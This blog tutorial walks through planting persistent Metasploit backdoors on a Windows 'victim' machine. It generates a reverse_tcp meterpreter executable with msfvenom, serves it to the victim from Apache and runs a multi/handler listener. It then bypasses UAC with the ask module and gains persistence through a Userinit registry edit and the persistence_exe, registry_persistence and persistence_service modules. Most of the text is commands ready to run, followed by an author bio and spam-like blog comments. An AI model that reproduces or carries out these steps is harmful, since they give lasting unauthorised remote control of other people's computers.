In this article, we will learn how to create a persistent backdoor with the help of metasploit framework on the host machine.
As we know that persistence also known as permanent. Persistent backdoors help us to take permanent access of system. There are so many types of Persistent backdoors but it work similar. Usually attacker create a backdoor service with help of metasolpit framework and upload on startup program of the vicitm machine then whenever victim reboot his system the attacker successfully connect back. Almost Persistent backdoors work similar but everyone upload their service in different directory. So in this article we are sharing multiple ways to create permanent backdoor on vicitm machine.
Lets start !!
To perform all persistent backdoor techniques, we have to compromise of the victim machine with the meterpreter session.
Start your kali machine, navigate on desktop and create a payload by given this command.
Note : Lhost will be according to your ip address.
ifconfigmsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe >secnhack.exeShare your payload on apache server or php server.
service start apache2
mv secnhack.exe /var/www/html/Share your ip to victim so that he would download your payload.
For controlling this payload open metasploit framework and execute this commands by given below.
msfconsoleuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (your ip)
set lport 4444
exploitNice ! After meterpreter session we need to bypass (UAC) User Account Control to get full privileges of victim account.
use exploit/windows/local/ask
set session 1
exploitWhen we execute this module you can observe a popup window show on victim machine which will ask yes or no, after click yes by victim.
Successfull ! Now you have administrator rights of victim machine.
Winlogon is a window component which control many activity such as shutdown, lock screen, loading user profile, logon, logoff etc and registry defines which processes to start during Windows logon.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
In the directory of winlogon has 3 types of registry keys in which we will choose uerinit registry keys for modification
Userinit is a another component software of windows. it is resporesponsible for window logon.
As you know that we already have compromised of the victim machine and have meterpreter session with admin privileges.
Now we need to go system32 directory for uploading our payload.
pwd
cd /windows/system32
upload secnhack.exeAfter to do this we have to go shell prompt for execute this command given below.
shell
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, secnhack.exe" /fAfter reboot the system old meterpreter session will be closed and for connect back execute this commands given below.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (your ip)
set lport 4444
exploitWhen victim will login into the system automatically we will get meterpreter session due to autorun script under registry.
Successfully persistence_exe executed !!
Done !!
Persistence exe module are another way to create permanent backdoor on victim machine. This Module will upload an executable on C:\Users\hp\AppData\Local\Temp\default.exe to a remote host and make it Permanent backdoor.
After compromise with machine of victim enter these commands for making it persistent.
use post/windows/manage/persistence_exe
set rexpath /root/secnhack.exe
set session 3
exploitFor connect back execute this commands given below.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (your ip)
set lport 4444
exploitWhen the victim system starts, we will gain meterpreter session again.
Done !!
This module create a persistence service and install on HKCU\Software directory in victim machine that is execute during booting of the system.
Use the following commands to execute the registry persistence.
use exploit/windows/local/registry_persistence
set session 9
exploitAgain for connect back execute this commands given below.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (your ip)
set lport 4444
exploitAfter restart the machine of victim, we will get meterpreter session again.
Done !!
This module will generate a payload and upload an executable on C:\Users\hp\AppData\Local\Temp\TMsbf.exe directory to a remote host. We already have done compromised with victim machine, so for generate a persistence service execute the commands given below.
use exploit/windows/local/persistence_service
set session 7
exploitFor connect back execute this commands given below.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (your ip)
set lport 4444
exploitWhen victim will reboot thier system, then we will get meterpreter session again.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
The security of your API should be one of the top priorities of companies. Without…
Hey Folks, In today's business world, it is essential to have an online presence. However,…
Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…
This website uses cookies.
View Comments
I Love Sechack 😍
Thanks a lot :) !! Keep sharing our content.
I've been browsing online more than 2 hours today, yet I never
found any interesting article like yours. It's pretty worth enough for
me. In my opinion, if all web owners and bloggers made good content as you did, the internet
will be a lot more useful than ever before.
It's more then enough compliment to us :)m!!
Nice post. I was checking constantly this blog
and I am impressed! Extremely helpful info specifically the last part :) I
care for such info a lot. I was looking for this particular info for a long time.
Thank you and best of luck.
Thanks :) !!
I like what you guys are up too. This type of clever work and
reporting! Keep up the very good works guys I've incorporated you guys
to my blogroll.
Heya this is somewhat of off topic but I was wondering if blogs use WYSIWYG editors or if you have to manually
code with HTML. I'm starting a blog soon but have no coding experience so I
wanted to get guidance from someone with experience.
Any help would be enormously appreciated!
An impressive share! I have just forwarded this onto a colleague who had been conducting a little homework on this.
And he in fact bought me lunch because I found it for him...
lol. So allow me to reword this.... Thanks
for the meal!! But yeah, thanx for spending the time to
talk about this issue here on your blog.
My developer is trying to persuade me to move to .net
from PHP. I have always disliked the idea because of the costs.
But he's tryiong none the less. I've been using Movable-type on a number of websites for about a year and
am nervous about switching to another platform. I have heard great things about blogengine.net.
Is there a way I can import all my wordpress content into it?
Any help would be greatly appreciated!
Howdy! I know this is sort of off-topic but I needed to ask.
Does managing a well-established website like yours require a lot of work?
I am brand new to blogging however I do write in my journal on a daily
basis. I'd like to start a blog so I will be able to share my experience
and thoughts online. Please let me know if you have any kind of suggestions
or tips for brand new aspiring blog owners. Thankyou!
Hey! Do you know if they make any plugins to help with Search Engine Optimization?
I'm trying to get my blog to rank for some targeted keywords
but I'm not seeing very good results. If you know of any please share.
Appreciate it!
I visited various blogs but the audio feature for audio songs existing at this web site is in fact
marvelous.